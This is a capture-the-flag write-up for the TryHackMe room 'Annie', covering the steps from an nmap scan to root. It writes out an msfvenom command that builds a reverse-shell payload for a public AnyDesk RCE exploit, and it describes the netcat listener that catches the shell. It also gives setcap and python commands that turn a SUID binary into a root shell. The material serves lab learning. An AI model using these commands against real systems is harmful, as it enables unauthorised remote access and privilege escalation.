Annie Writeup - TryHackMe


2 min read

Annie Writeup - TryHackMe

๐Ÿ‘‹ Introduction

Hi there!, Annie is a room in TryHackme Rated as Medium. I found it to be easy. Without Further Ado lets Start!

๐Ÿ” Enumeration


As always we do , lets start off with an nmap scan.

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 7e:43:5f:1e:58:a8:fc:c9:f7:fd:4b:40:0b:83:79:32 (RSA)
    |   256 5c:79:92:dd:e9:d1:46:50:70:f0:34:62:26:f0:69:39 (ECDSA)
    |_  256 ce:d9:82:2b:69:5f:82:d0:f5:5c:9b:3e:be:76:88:c3 (ED25519)

7070/tcp open  ssl/realserver?
    |_ssl_date:TLS randomness does not represent time.
    |_ssl_cert: Subject: CommonName=AnyDesk Client
Service Info: OS: Linux; CPE: cpe:/o:linux:

We see that we have two open ports. One being SSH and other being a AnyDesk server in port 7070. from the Caption of this room- "Remote access comes in different flavors." , we get that this room has something to do with Remote access softwares like Anydesk. from searching "AnyDesk Exploits" in Google, we get a RCE exploit for AnyDesk 5.5.2, we really doesn't know yet if the box has the vulnerable version. But sometimes it is better to just try it.

We need to Modify the script in order for it to work, Generate another shellcode using msfvenom (with our THM-ip) and replace the shell code in the exploit with the new one.

msfvenom -p linux/x64/shell_reverse_tcp LHOST= TRYHACKME_IP_HERE LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode

Exploiting AnyDesk:

Setup a NETCAT listener on the port you set on the MSFVENOM. Execute the python script and wait for the connection.
If the Reverse shell doesn't drop within 2-3 minutes. Reset the machine and try again. (I got it right the second time.)

Dropped the Shell!

When you search for SUID files, you find an interesting file as the first result.

Setcap is a linux binary which can be used to Give capabilities to a another binary. According to the Linux man page:

"Setcap sets the capabilities of each specified filename to the capabilities specified.""

We can Effectively escalate and drop a root shell if we give Python (or any language you know) the capability to set UID.

annie@desktop:~ /sbin/setcap cap_setuid+ep /usr/share/python3
annie@desktop:~ /usr/share/python3 -c 'import os;os.setuid(0); os.system("/bin/bash")'